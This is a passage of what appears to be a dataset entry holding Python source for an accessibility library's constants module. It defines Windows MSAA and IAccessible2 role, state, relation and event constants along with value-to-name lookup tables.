(32781):\n u'EVENT_OBJECT_DESCRIPTIONCHANGE', (32782): u'EVENT_OBJECT_VALUECHANGE',\n (32783): u'EVENT_OBJECT_PARENTCHANGE', (32784):\n u'EVENT_OBJECT_HELPCHANGE', (32785): u'EVENT_OBJECT_DEFACTIONCHANGE', (\n 32786): u'EVENT_OBJECT_ACCELERATORCHANGE'}\nwinEventIDsToEventNames = {}\nfor _sym, _val in locals().items():\n if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):\n winEventIDsToEventNames[_val] = _sym\n",
"step-4": "'''\nUseful constants.\n\nInspired by pyatspi:\nhttp://live.gnome.org/GAP/PythonATSPI\n\n@author: Eitan Isaacson\n@copyright: Copyright (c) 2008, Eitan Isaacson\n@license: LGPL\n\nThis library is free software; you can redistribute it and/or\nmodify it under the terms of the GNU Library General Public\nLicense as published by the Free Software Foundation; either\nversion 2 of the License, or (at your option) any later version.\n\nThis library is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nLibrary General Public License for more details.\n\nYou should have received a copy of the GNU Library General Public\nLicense along with this library; if not, write to the\nFree Software Foundation, Inc., 59 Temple Place - Suite 330,\nBoston, MA 02111-1307, USA.\n'''\n# Child ID.\nCHILDID_SELF = 0\n\n# IAccessibleText Constants\nIA2_TEXT_OFFSET_LENGTH = -1\nIA2_TEXT_OFFSET_CARET = -2\n\n# Accessible Roles\n# TODO: Is there a way to retrieve this at runtime or build time?\n#\nROLE_SYSTEM_ALERT = 8\nROLE_SYSTEM_ANIMATION = 54\nROLE_SYSTEM_APPLICATION = 14\nROLE_SYSTEM_BORDER = 19\nROLE_SYSTEM_BUTTONDROPDOWN = 56\nROLE_SYSTEM_BUTTONDROPDOWNGRID = 58\nROLE_SYSTEM_BUTTONMENU = 57\nROLE_SYSTEM_CARET = 7\nROLE_SYSTEM_CELL = 29\nROLE_SYSTEM_CHARACTER = 32\nROLE_SYSTEM_CHART = 17\nROLE_SYSTEM_CHECKBUTTON = 44\nROLE_SYSTEM_CLIENT = 10\nROLE_SYSTEM_CLOCK = 61\nROLE_SYSTEM_COLUMN = 27\nROLE_SYSTEM_COLUMNHEADER = 25\nROLE_SYSTEM_COMBOBOX = 46\nROLE_SYSTEM_CURSOR = 6\nROLE_SYSTEM_DIAGRAM = 53\nROLE_SYSTEM_DIAL = 49\nROLE_SYSTEM_DIALOG = 18\nROLE_SYSTEM_DOCUMENT = 15\nROLE_SYSTEM_DROPLIST = 47\nROLE_SYSTEM_EQUATION = 55\nROLE_SYSTEM_GRAPHIC = 40\nROLE_SYSTEM_GRIP = 4\nROLE_SYSTEM_GROUPING = 20\nROLE_SYSTEM_HELPBALLOON = 31\nROLE_SYSTEM_HOTKEYFIELD = 50\nROLE_SYSTEM_INDICATOR = 39\nROLE_SYSTEM_LINK = 30\nROLE_SYSTEM_LIST = 33\nROLE_SYSTEM_LISTITEM = 34\nROLE_SYSTEM_MENUBAR = 2\nROLE_SYSTEM_MENUITEM = 12\nROLE_SYSTEM_MENUPOPUP = 11\nROLE_SYSTEM_OUTLINE = 35\nROLE_SYSTEM_OUTLINEITEM = 36\nROLE_SYSTEM_PAGETAB = 37\nROLE_SYSTEM_PAGETABLIST = 60\nROLE_SYSTEM_PANE = 16\nROLE_SYSTEM_PROGRESSBAR = 48\nROLE_SYSTEM_PROPERTYPAGE = 38\nROLE_SYSTEM_PUSHBUTTON = 43\nROLE_SYSTEM_RADIOBUTTON = 45\nROLE_SYSTEM_ROW = 28\nROLE_SYSTEM_ROWHEADER = 26\nROLE_SYSTEM_SCROLLBAR = 3\nROLE_SYSTEM_SEPARATOR = 21\nROLE_SYSTEM_SLIDER = 51\nROLE_SYSTEM_SOUND = 5\nROLE_SYSTEM_SPINBUTTON = 52\nROLE_SYSTEM_STATICTEXT = 41\nROLE_SYSTEM_STATUSBAR = 23\nROLE_SYSTEM_TABLE = 24\nROLE_SYSTEM_TEXT = 42\nROLE_SYSTEM_TITLEBAR = 1\nROLE_SYSTEM_TOOLBAR = 22\nROLE_SYSTEM_TOOLTIP = 13\nROLE_SYSTEM_WHITESPACE = 59\nROLE_SYSTEM_WINDOW = 9\n\nIA2_ROLE_UNKNOWN = 0\nIA2_ROLE_CANVAS = 0x401\nIA2_ROLE_CAPTION = 0x402\nIA2_ROLE_CHECK_MENU_ITEM = 0x403\nIA2_ROLE_COLOR_CHOOSER = 0x404\nIA2_ROLE_DATE_EDITOR = 0x405\nIA2_ROLE_DESKTOP_ICON = 0x406\nIA2_ROLE_DESKTOP_PANE = 0x407\nIA2_ROLE_DIRECTORY_PANE = 0x408\nIA2_ROLE_EDITBAR = 0x409\nIA2_ROLE_EMBEDDED_OBJECT = 0x40a\nIA2_ROLE_ENDNOTE = 0x40b\nIA2_ROLE_FILE_CHOOSER = 0x40c\nIA2_ROLE_FONT_CHOOSER = 0x40d\nIA2_ROLE_FOOTER = 0x40e\nIA2_ROLE_FOOTNOTE = 0x40f\nIA2_ROLE_FORM = 0x410\nIA2_ROLE_FRAME = 0x411\nIA2_ROLE_GLASS_PANE = 0x412\nIA2_ROLE_HEADER = 0x413\nIA2_ROLE_HEADING = 0x414\nIA2_ROLE_ICON = 0x415\nIA2_ROLE_IMAGE_MAP = 0x416\nIA2_ROLE_INPUT_METHOD_WINDOW = 0x417\nIA2_ROLE_INTERNAL_FRAME = 0x418\nIA2_ROLE_LABEL = 0x419\nIA2_ROLE_LAYERED_PANE = 0x41a\nIA2_ROLE_NOTE = 
0x41b\nIA2_ROLE_OPTION_PANE = 0x41c\nIA2_ROLE_PAGE = 0x41d\nIA2_ROLE_PARAGRAPH = 0x41e\nIA2_ROLE_RADIO_MENU_ITEM = 0x41f\nIA2_ROLE_REDUNDANT_OBJECT = 0x420\nIA2_ROLE_ROOT_PANE = 0x421\nIA2_ROLE_RULER = 0x422\nIA2_ROLE_SCROLL_PANE = 0x423\nIA2_ROLE_SECTION = 0x424\nIA2_ROLE_SHAPE = 0x425\nIA2_ROLE_SPLIT_PANE = 0x426\nIA2_ROLE_TEAR_OFF_MENU = 0x427\nIA2_ROLE_TERMINAL = 0x428\nIA2_ROLE_TEXT_FRAME = 0x429\nIA2_ROLE_TOGGLE_BUTTON = 0x42a\nIA2_ROLE_VIEW_PORT = 0x42b\nIA2_ROLE_COMPLEMENTARY_CONTENT = 0x42c\nIA2_ROLE_LANDMARK = 0x42d\n\n\n\n# Unlocalized role strings\nUNLOCALIZED_ROLE_NAMES = {\n 1: u'ROLE_SYSTEM_TITLEBAR',\n 2: u'ROLE_SYSTEM_MENUBAR',\n 3: u'ROLE_SYSTEM_SCROLLBAR',\n 4: u'ROLE_SYSTEM_GRIP',\n 5: u'ROLE_SYSTEM_SOUND',\n 6: u'ROLE_SYSTEM_CURSOR',\n 7: u'ROLE_SYSTEM_CARET',\n 8: u'ROLE_SYSTEM_ALERT',\n 9: u'ROLE_SYSTEM_WINDOW',\n 10: u'ROLE_SYSTEM_CLIENT',\n 11: u'ROLE_SYSTEM_MENUPOPUP',\n 12: u'ROLE_SYSTEM_MENUITEM',\n 13: u'ROLE_SYSTEM_TOOLTIP',\n 14: u'ROLE_SYSTEM_APPLICATION',\n 15: u'ROLE_SYSTEM_DOCUMENT',\n 16: u'ROLE_SYSTEM_PANE',\n 17: u'ROLE_SYSTEM_CHART',\n 18: u'ROLE_SYSTEM_DIALOG',\n 19: u'ROLE_SYSTEM_BORDER',\n 20: u'ROLE_SYSTEM_GROUPING',\n 21: u'ROLE_SYSTEM_SEPARATOR',\n 22: u'ROLE_SYSTEM_TOOLBAR',\n 23: u'ROLE_SYSTEM_STATUSBAR',\n 24: u'ROLE_SYSTEM_TABLE',\n 25: u'ROLE_SYSTEM_COLUMNHEADER',\n 26: u'ROLE_SYSTEM_ROWHEADER',\n 27: u'ROLE_SYSTEM_COLUMN',\n 28: u'ROLE_SYSTEM_ROW',\n 29: u'ROLE_SYSTEM_CELL',\n 30: u'ROLE_SYSTEM_LINK',\n 31: u'ROLE_SYSTEM_HELPBALLOON',\n 32: u'ROLE_SYSTEM_CHARACTER',\n 33: u'ROLE_SYSTEM_LIST',\n 34: u'ROLE_SYSTEM_LISTITEM',\n 35: u'ROLE_SYSTEM_OUTLINE',\n 36: u'ROLE_SYSTEM_OUTLINEITEM',\n 37: u'ROLE_SYSTEM_PAGETAB',\n 38: u'ROLE_SYSTEM_PROPERTYPAGE',\n 39: u'ROLE_SYSTEM_INDICATOR',\n 40: u'ROLE_SYSTEM_GRAPHIC',\n 41: u'ROLE_SYSTEM_STATICTEXT',\n 42: u'ROLE_SYSTEM_TEXT',\n 43: u'ROLE_SYSTEM_PUSHBUTTON',\n 44: u'ROLE_SYSTEM_CHECKBUTTON',\n 45: u'ROLE_SYSTEM_RADIOBUTTON',\n 46: u'ROLE_SYSTEM_COMBOBOX',\n 47: u'ROLE_SYSTEM_DROPLIST',\n 48: u'ROLE_SYSTEM_PROGRESSBAR',\n 49: u'ROLE_SYSTEM_DIAL',\n 50: u'ROLE_SYSTEM_HOTKEYFIELD',\n 51: u'ROLE_SYSTEM_SLIDER',\n 52: u'ROLE_SYSTEM_SPINBUTTON',\n 53: u'ROLE_SYSTEM_DIAGRAM',\n 54: u'ROLE_SYSTEM_ANIMATION',\n 55: u'ROLE_SYSTEM_EQUATION',\n 56: u'ROLE_SYSTEM_BUTTONDROPDOWN',\n 57: u'ROLE_SYSTEM_BUTTONMENU',\n 58: u'ROLE_SYSTEM_BUTTONDROPDOWNGRID',\n 59: u'ROLE_SYSTEM_WHITESPACE',\n 60: u'ROLE_SYSTEM_PAGETABLIST',\n 61: u'ROLE_SYSTEM_CLOCK'}\n\n# Unlocalized role strings\nUNLOCALIZED_IA2_ROLE_NAMES = {\n 0x000: u'IA2_ROLE_UNKNOWN',\n 0x401: u'IA2_ROLE_CANVAS',\n 0x402: u'IA2_ROLE_CAPTION',\n 0x403: u'IA2_ROLE_CHECK_MENU_ITEM',\n 0x404: u'IA2_ROLE_COLOR_CHOOSER',\n 0x405: u'IA2_ROLE_DATE_EDITOR',\n 0x406: u'IA2_ROLE_DESKTOP_ICON',\n 0x407: u'IA2_ROLE_DESKTOP_PANE',\n 0x408: u'IA2_ROLE_DIRECTORY_PANE',\n 0x409: u'IA2_ROLE_EDITBAR',\n 0x40a: u'IA2_ROLE_EMBEDDED_OBJECT',\n 0x40b: u'IA2_ROLE_ENDNOTE',\n 0x40c: u'IA2_ROLE_FILE_CHOOSER',\n 0x40d: u'IA2_ROLE_FONT_CHOOSER',\n 0x40e: u'IA2_ROLE_FOOTER',\n 0x40f: u'IA2_ROLE_FOOTNOTE',\n 0x410: u'IA2_ROLE_FORM',\n 0x411: u'IA2_ROLE_FRAME',\n 0x412: u'IA2_ROLE_GLASS_PANE',\n 0x413: u'IA2_ROLE_HEADER',\n 0x414: u'IA2_ROLE_HEADING',\n 0x415: u'IA2_ROLE_ICON',\n 0x416: u'IA2_ROLE_IMAGE_MAP',\n 0x417: u'IA2_ROLE_INPUT_METHOD_WINDOW',\n 0x418: u'IA2_ROLE_INTERNAL_FRAME',\n 0x419: u'IA2_ROLE_LABEL',\n 0x41a: u'IA2_ROLE_LAYERED_PANE',\n 0x41b: u'IA2_ROLE_NOTE',\n 0x41c: u'IA2_ROLE_OPTION_PANE',\n 0x41d: u'IA2_ROLE_PAGE',\n 0x41e: u'IA2_ROLE_PARAGRAPH',\n 0x41f: 
u'IA2_ROLE_RADIO_MENU_ITEM',\n 0x420: u'IA2_ROLE_REDUNDANT_OBJECT',\n 0x421: u'IA2_ROLE_ROOT_PANE',\n 0x422: u'IA2_ROLE_RULER',\n 0x423: u'IA2_ROLE_SCROLL_PANE',\n 0x424: u'IA2_ROLE_SECTION',\n 0x425: u'IA2_ROLE_SHAPE',\n 0x426: u'IA2_ROLE_SPLIT_PANE',\n 0x427: u'IA2_ROLE_TEAR_OFF_MENU',\n 0x428: u'IA2_ROLE_TERMINAL',\n 0x429: u'IA2_ROLE_TEXT_FRAME',\n 0x42a: u'IA2_ROLE_TOGGLE_BUTTON',\n 0x42b: u'IA2_ROLE_VIEW_PORT',\n 0x42c: u'IA2_ROLE_COMPLEMENTARY_CONTENT',\n 0x42d: u'IA2_ROLE_LANDMARK'}\n\n# Navigation constants\nNAVDIR_DOWN = 2\nNAVDIR_FIRSTCHILD = 7\nNAVDIR_LASTCHILD = 8\nNAVDIR_LEFT = 3\nNAVDIR_NEXT = 5\nNAVDIR_PREVIOUS = 6\nNAVDIR_RIGHT = 4\nNAVDIR_UP = 1\n\nSTATE_SYSTEM_UNAVAILABLE = 0x1\nSTATE_SYSTEM_SELECTED = 0x2\nSTATE_SYSTEM_FOCUSED = 0x4\nSTATE_SYSTEM_PRESSED = 0x8\nSTATE_SYSTEM_CHECKED = 0x10\nSTATE_SYSTEM_MIXED = 0x20\nSTATE_SYSTEM_READONLY = 0x40\nSTATE_SYSTEM_HOTTRACKED = 0x80\nSTATE_SYSTEM_DEFAULT = 0x100\nSTATE_SYSTEM_EXPANDED = 0x200\nSTATE_SYSTEM_COLLAPSED = 0x400\nSTATE_SYSTEM_BUSY = 0x800\nSTATE_SYSTEM_FLOATING = 0x1000\nSTATE_SYSTEM_MARQUEED = 0x2000\nSTATE_SYSTEM_ANIMATED = 0x4000\nSTATE_SYSTEM_INVISIBLE = 0x8000\nSTATE_SYSTEM_OFFSCREEN = 0x10000\nSTATE_SYSTEM_SIZEABLE = 0x20000\nSTATE_SYSTEM_MOVEABLE = 0x40000\nSTATE_SYSTEM_SELFVOICING = 0x80000\nSTATE_SYSTEM_FOCUSABLE = 0x100000\nSTATE_SYSTEM_SELECTABLE = 0x200000\nSTATE_SYSTEM_LINKED = 0x400000\nSTATE_SYSTEM_TRAVERSED = 0x800000\nSTATE_SYSTEM_MULTISELECTABLE = 0x1000000\nSTATE_SYSTEM_EXTSELECTABLE = 0x2000000\nSTATE_SYSTEM_HASSUBMENU = 0x4000000\nSTATE_SYSTEM_ALERT_LOW = 0x4000000\nSTATE_SYSTEM_ALERT_MEDIUM = 0x8000000\nSTATE_SYSTEM_ALERT_HIGH = 0x10000000\nSTATE_SYSTEM_PROTECTED = 0x20000000\nSTATE_SYSTEM_HASPOPUP = 0x40000000\nSTATE_SYSTEM_VALID = 0x1fffffff\n\n\n# Unlocalized state strings\nUNLOCALIZED_STATE_NAMES = {\n 1: u'STATE_SYSTEM_UNAVAILABLE',\n 2: u'STATE_SYSTEM_SELECTED',\n 4: u'STATE_SYSTEM_FOCUSED',\n 8: u'STATE_SYSTEM_PRESSED',\n 16: u'STATE_SYSTEM_CHECKED',\n 32: u'STATE_SYSTEM_MIXED',\n 64: u'STATE_SYSTEM_READONLY',\n 128: u'STATE_SYSTEM_HOTTRACKED',\n 256: u'STATE_SYSTEM_DEFAULT',\n 512: u'STATE_SYSTEM_EXPANDED',\n 1024: u'STATE_SYSTEM_COLLAPSED',\n 2048: u'STATE_SYSTEM_BUSY',\n 4096: u'STATE_SYSTEM_FLOATING',\n 8192: u'STATE_SYSTEM_MARQUEED',\n 16384: u'STATE_SYSTEM_ANIMATED',\n 32768: u'STATE_SYSTEM_INVISIBLE',\n 65536: u'STATE_SYSTEM_OFFSCREEN',\n 131072: u'STATE_SYSTEM_SIZEABLE',\n 262144: u'STATE_SYSTEM_MOVEABLE',\n 524288: u'STATE_SYSTEM_SELFVOICING',\n 1048576: u'STATE_SYSTEM_FOCUSABLE',\n 2097152: u'STATE_SYSTEM_SELECTABLE',\n 4194304: u'STATE_SYSTEM_LINKED',\n 8388608: u'STATE_SYSTEM_TRAVERSED',\n 16777216: u'STATE_SYSTEM_MULTISELECTABLE',\n 33554432: u'STATE_SYSTEM_EXTSELECTABLE',\n 67108864: u'STATE_SYSTEM_ALERT_LOW',\n 134217728: u'STATE_SYSTEM_ALERT_MEDIUM',\n 268435456: u'STATE_SYSTEM_ALERT_HIGH',\n 536870912: u'STATE_SYSTEM_PROTECTED',\n 1073741824: u'STATE_SYSTEM_HASPOPUP',\n 0x1fffffff: u'STATE_SYSTEM_VALID'}\n\nIA2_STATE_ACTIVE = 0x1\nIA2_STATE_ARMED = 0x2\nIA2_STATE_DEFUNCT = 0x4\nIA2_STATE_EDITABLE = 0x8\nIA2_STATE_HORIZONTAL = 0x10\nIA2_STATE_ICONIFIED = 0x20\nIA2_STATE_INVALID_ENTRY = 0x40\nIA2_STATE_MANAGES_DESCENDANTS = 0x80\nIA2_STATE_MODAL = 0x100\nIA2_STATE_MULTI_LINE = 0x200\nIA2_STATE_OPAQUE = 0x400\nIA2_STATE_REQUIRED = 0x800\nIA2_STATE_SELECTABLE_TEXT = 0x1000\nIA2_STATE_SINGLE_LINE = 0x2000\nIA2_STATE_STALE = 0x4000\nIA2_STATE_SUPPORTS_AUTOCOMPLETION = 0x8000\nIA2_STATE_TRANSIENT = 0x10000\nIA2_STATE_VERTICAL = 0x20000\nIA2_STATE_CHECKABLE = 
0x40000\nIA2_STATE_PINNED = 0x80000\n\nUNLOCALIZED_IA2_STATE_NAMES = {\n 1: u'IA2_STATE_ACTIVE',\n 2: u'IA2_STATE_ARMED',\n 4: u'IA2_STATE_DEFUNCT',\n 8: u'IA2_STATE_EDITABLE',\n 16: u'IA2_STATE_HORIZONTAL',\n 32: u'IA2_STATE_ICONIFIED',\n 64: u'IA2_STATE_INVALID_ENTRY',\n 128: u'IA2_STATE_MANAGES_DESCENDANTS',\n 256: u'IA2_STATE_MODAL',\n 512: u'IA2_STATE_MULTI_LINE',\n 1024: u'IA2_STATE_OPAQUE',\n 2048: u'IA2_STATE_REQUIRED',\n 4096: u'IA2_STATE_SELECTABLE_TEXT',\n 8192: u'IA2_STATE_SINGLE_LINE',\n 16384: u'IA2_STATE_STALE',\n 32768: u'IA2_STATE_SUPPORTS_AUTOCOMPLETION',\n 65536: u'IA2_STATE_TRANSIENT',\n 131072: u'IA2_STATE_VERTICAL',\n 262144: u'IA2_STATE_CHECKABLE',\n 524288: u'IA2_STATE_PINNED'}\n\nUNLOCALIZED_IA2_RELATION_TYPES = {\n u'containingApplication' : u'IA2_RELATION_CONTAINING_APPLICATION',\n u'containingDocument' : u'IA2_RELATION_CONTAINING_DOCUMENT',\n u'containingTabPane' : u'IA2_RELATION_CONTAINING_TAB_PANE',\n u'containingWindow' : u'IA2_RELATION_CONTAINING_WINDOW',\n u'controlledBy' : u'IA2_RELATION_CONTROLLED_BY',\n u'controllerFor' : u'IA2_RELATION_CONTROLLER_FOR',\n u'describedBy' : u'IA2_RELATION_DESCRIBED_BY',\n u'descriptionFor' : u'IA2_RELATION_DESCRIPTION_FOR',\n u'details' : u'IA2_RELATION_DETAILS',\n u'detailsFor' : u'IA2_RELATION_DETAILS_FOR',\n u'embeddedBy' : u'IA2_RELATION_EMBEDDED_BY',\n u'embeds' : u'IA2_RELATION_EMBEDS',\n u'errorMessage' : u'IA2_RELATION_ERROR_MESSAGE',\n u'errorFor' : u'IA2_RELATION_ERROR_FOR',\n u'flowsFrom' : u'IA2_RELATION_FLOWS_FROM',\n u'flowsTo' : u'IA2_RELATION_FLOWS_TO',\n u'labelFor' : u'IA2_RELATION_LABEL_FOR',\n u'labelledBy' : u'IA2_RELATION_LABELED_BY',\n u'labelledBy' : u'IA2_RELATION_LABELLED_BY',\n u'memberOf' : u'IA2_RELATION_MEMBER_OF',\n u'nextTabbable' : u'IA2_RELATION_NEXT_TABBABLE',\n u'nodeChildOf' : u'IA2_RELATION_NODE_CHILD_OF',\n u'nodeParentOf' : u'IA2_RELATION_NODE_PARENT_OF',\n u'parentWindowOf' : u'IA2_RELATION_PARENT_WINDOW_OF',\n u'popupFor' : u'IA2_RELATION_POPUP_FOR',\n u'previousTabbable' : u'IA2_RELATION_PREVIOUS_TABBABLE',\n u'subwindowOf' : u'IA2_RELATION_SUBWINDOW_OF'}\n\n\n# SetWinEventHook() flags\nWINEVENT_OUTOFCONTEXT = 0x0\nWINEVENT_SKIPOWNTHREAD =0x1\nWINEVENT_SKIPOWNPROCESS = 0x2\nWINEVENT_INCONTEXT = 0x4\n\n#win events\nEVENT_SYSTEM_SOUND = 0x1\nEVENT_SYSTEM_ALERT = 0x2\nEVENT_SYSTEM_FOREGROUND = 0x3\nEVENT_SYSTEM_MENUSTART = 0x4\nEVENT_SYSTEM_MENUEND = 0x5\nEVENT_SYSTEM_MENUPOPUPSTART = 0x6\nEVENT_SYSTEM_MENUPOPUPEND = 0x7\nEVENT_SYSTEM_CAPTURESTART = 0x8\nEVENT_SYSTEM_CAPTUREEND = 0x9\nEVENT_SYSTEM_MOVESIZESTART = 0xa\nEVENT_SYSTEM_MOVESIZEEND = 0xb\nEVENT_SYSTEM_CONTEXTHELPSTART = 0xc\nEVENT_SYSTEM_CONTEXTHELPEND = 0xd\nEVENT_SYSTEM_DRAGDROPSTART = 0xe\nEVENT_SYSTEM_DRAGDROPEND = 0xf\nEVENT_SYSTEM_DIALOGSTART = 0x10\nEVENT_SYSTEM_DIALOGEND = 0x11\nEVENT_SYSTEM_SCROLLINGSTART = 0x12\nEVENT_SYSTEM_SCROLLINGEND = 0x13\nEVENT_SYSTEM_SWITCHSTART = 0x14\nEVENT_SYSTEM_SWITCHEND = 0x15\nEVENT_SYSTEM_MINIMIZESTART = 0x16\nEVENT_SYSTEM_MINIMIZEEND = 0x17\nEVENT_OBJECT_CREATE = 0x8000\nEVENT_OBJECT_DESTROY = 0x8001\nEVENT_OBJECT_SHOW = 0x8002\nEVENT_OBJECT_HIDE = 0x8003\nEVENT_OBJECT_REORDER = 0x8004\nEVENT_OBJECT_FOCUS = 0x8005\nEVENT_OBJECT_SELECTION = 0x8006\nEVENT_OBJECT_SELECTIONADD = 0x8007\nEVENT_OBJECT_SELECTIONREMOVE = 0x8008\nEVENT_OBJECT_SELECTIONWITHIN = 0x8009\nEVENT_OBJECT_STATECHANGE = 0x800a\nEVENT_OBJECT_LOCATIONCHANGE = 0x800b\nEVENT_OBJECT_NAMECHANGE = 0x800c\nEVENT_OBJECT_DESCRIPTIONCHANGE = 0x800d\nEVENT_OBJECT_VALUECHANGE = 0x800e\nEVENT_OBJECT_PARENTCHANGE = 
0x800f\nEVENT_OBJECT_HELPCHANGE = 0x8010\nEVENT_OBJECT_DEFACTIONCHANGE = 0x8011\nEVENT_OBJECT_ACCELERATORCHANGE = 0x8012\nEVENT_CONSOLE_CARET = 0x4001\nEVENT_CONSOLE_UPDATE_REGION = 0x4002\nEVENT_CONSOLE_UPDATE_SIMPLE = 0x4003\nEVENT_CONSOLE_UPDATE_SCROLL = 0x4004\nEVENT_CONSOLE_LAYOUT = 0x4005\nEVENT_CONSOLE_START_APPLICATION = 0x4006\nEVENT_CONSOLE_END_APPLICATION = 0x4007\n\n# IAccessible2 events\nIA2_EVENT_ACTION_CHANGED = 0x101\nIA2_EVENT_ACTIVE_DECENDENT_CHANGED = 0x102\nIA2_EVENT_ACTIVE_DESCENDANT_CHANGED = 0x102\nIA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED = 0x103\nIA2_EVENT_DOCUMENT_CONTENT_CHANGED = 0x104\nIA2_EVENT_DOCUMENT_LOAD_COMPLETE = 0x105\nIA2_EVENT_DOCUMENT_LOAD_STOPPED = 0x106\nIA2_EVENT_DOCUMENT_RELOAD = 0x107\nIA2_EVENT_HYPERLINK_END_INDEX_CHANGED = 0x108\nIA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED = 0x109\nIA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED = 0x10a\nIA2_EVENT_HYPERTEXT_LINK_ACTIVATED = 0x10b\nIA2_EVENT_HYPERTEXT_LINK_SELECTED = 0x10c\nIA2_EVENT_HYPERLINK_START_INDEX_CHANGED = 0x10d\nIA2_EVENT_HYPERTEXT_CHANGED = 0x10e\nIA2_EVENT_HYPERTEXT_NLINKS_CHANGED = 0x11f\nIA2_EVENT_OBJECT_ATTRIBUTE_CHANGED = 0x120\nIA2_EVENT_PAGE_CHANGED = 0x111\nIA2_EVENT_SECTION_CHANGED = 0x112\nIA2_EVENT_TABLE_CAPTION_CHANGED = 0x113\nIA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED = 0x114\nIA2_EVENT_TABLE_COLUMN_HEADER_CHANGED = 0x115\nIA2_EVENT_TABLE_MODEL_CHANGED = 0x116\nIA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED = 0x117\nIA2_EVENT_TABLE_ROW_HEADER_CHANGED = 0x118\nIA2_EVENT_TABLE_SUMMARY_CHANGED = 0x119\nIA2_EVENT_TEXT_ATTRIBUTE_CHANGED = 0x11a\nIA2_EVENT_TEXT_CARET_MOVED = 0x11b\nIA2_EVENT_TEXT_CHANGED = 0x11c\nIA2_EVENT_TEXT_COLUMN_CHANGED = 0x11d\nIA2_EVENT_TEXT_INSERTED = 0x11e\nIA2_EVENT_TEXT_REMOVED = 0x11f\nIA2_EVENT_TEXT_UPDATED = 0x120\nIA2_EVENT_TEXT_SELECTION_CHANGED = 0x121\nIA2_EVENT_VISIBLE_DATA_CHANGED = 0x122\n\nUNLOCALIZED_EVENT_NAMES = {\n\n 0x1: u'EVENT_SYSTEM_SOUND',\n 0x2: u'EVENT_SYSTEM_ALERT',\n 0x3: u'EVENT_SYSTEM_FOREGROUND',\n 0x4: u'EVENT_SYSTEM_MENUSTART',\n 0x5: u'EVENT_SYSTEM_MENUEND',\n 0x6: u'EVENT_SYSTEM_MENUPOPUPSTART',\n 0x7: u'EVENT_SYSTEM_MENUPOPUPEND',\n 0x8: u'EVENT_SYSTEM_CAPTURESTART',\n 0x9: u'EVENT_SYSTEM_CAPTUREEND',\n 0xa: u'EVENT_SYSTEM_MOVESIZESTART',\n 0xb: u'EVENT_SYSTEM_MOVESIZEEND',\n 0xc: u'EVENT_SYSTEM_CONTEXTHELPSTART',\n 0xd: u'EVENT_SYSTEM_CONTEXTHELPEND',\n 0xe: u'EVENT_SYSTEM_DRAGDROPSTART',\n 0xf: u'EVENT_SYSTEM_DRAGDROPEND',\n 0x10: u'EVENT_SYSTEM_DIALOGSTART',\n 0x11: u'EVENT_SYSTEM_DIALOGEND',\n 0x12: u'EVENT_SYSTEM_SCROLLINGSTART',\n 0x13: u'EVENT_SYSTEM_SCROLLINGEND',\n 0x14: u'EVENT_SYSTEM_SWITCHSTART',\n 0x15: u'EVENT_SYSTEM_SWITCHEND',\n 0x16: u'EVENT_SYSTEM_MINIMIZESTART',\n 0x17: u'EVENT_SYSTEM_MINIMIZEEND',\n\n 0x101: u'IA2_EVENT_ACTION_CHANGED',\n 0x102: u'IA2_EVENT_ACTIVE_DESCENDANT_CHANGED',\n 0x103: u'IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED',\n 0x104: u'IA2_EVENT_DOCUMENT_CONTENT_CHANGED',\n 0x105: u'IA2_EVENT_DOCUMENT_LOAD_COMPLETE',\n 0x106: u'IA2_EVENT_DOCUMENT_LOAD_STOPPED',\n 0x107: u'IA2_EVENT_DOCUMENT_RELOAD',\n 0x108: u'IA2_EVENT_HYPERLINK_END_INDEX_CHANGED',\n 0x109: u'IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED',\n 0x10a: u'IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED',\n 0x10b: u'IA2_EVENT_HYPERTEXT_LINK_ACTIVATED',\n 0x10c: u'IA2_EVENT_HYPERTEXT_LINK_SELECTED',\n 0x10d: u'IA2_EVENT_HYPERLINK_START_INDEX_CHANGED',\n 0x10e: u'IA2_EVENT_HYPERTEXT_CHANGED',\n 0x10f: u'IA2_EVENT_HYPERTEXT_NLINKS_CHANGED',\n 0x110: u'IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED',\n 0x111: u'IA2_EVENT_PAGE_CHANGED',\n 0x112: 
u'IA2_EVENT_SECTION_CHANGED',\n 0x113: u'IA2_EVENT_TABLE_CAPTION_CHANGED',\n 0x114: u'IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED',\n 0x115: u'IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED',\n 0x116: u'IA2_EVENT_TABLE_MODEL_CHANGED',\n 0x117: u'IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED',\n 0x118: u'IA2_EVENT_TABLE_ROW_HEADER_CHANGED',\n 0x119: u'IA2_EVENT_TABLE_SUMMARY_CHANGED',\n 0x11a: u'IA2_EVENT_TEXT_ATTRIBUTE_CHANGED',\n 0x11b: u'IA2_EVENT_TEXT_CARET_MOVED',\n 0x11c: u'IA2_EVENT_TEXT_CHANGED',\n 0x11d: u'IA2_EVENT_TEXT_COLUMN_CHANGED',\n 0x11e: u'IA2_EVENT_TEXT_INSERTED',\n 0x11f: u'IA2_EVENT_TEXT_REMOVED',\n 0x120: u'IA2_EVENT_TEXT_UPDATED',\n 0x121: u'IA2_EVENT_TEXT_SELECTION_CHANGED',\n 0x122: u'IA2_EVENT_VISIBLE_DATA_CHANGED',\n\n 0x4001: u'EVENT_CONSOLE_CARET',\n 0x4002: u'EVENT_CONSOLE_UPDATE_REGION',\n 0x4003: u'EVENT_CONSOLE_UPDATE_SIMPLE',\n 0x4004: u'EVENT_CONSOLE_UPDATE_SCROLL',\n 0x4005: u'EVENT_CONSOLE_LAYOUT',\n 0x4006: u'EVENT_CONSOLE_START_APPLICATION',\n 0x4007: u'EVENT_CONSOLE_END_APPLICATION',\n\n 0x8000: u'EVENT_OBJECT_CREATE',\n 0x8001: u'EVENT_OBJECT_DESTROY',\n 0x8002: u'EVENT_OBJECT_SHOW',\n 0x8003: 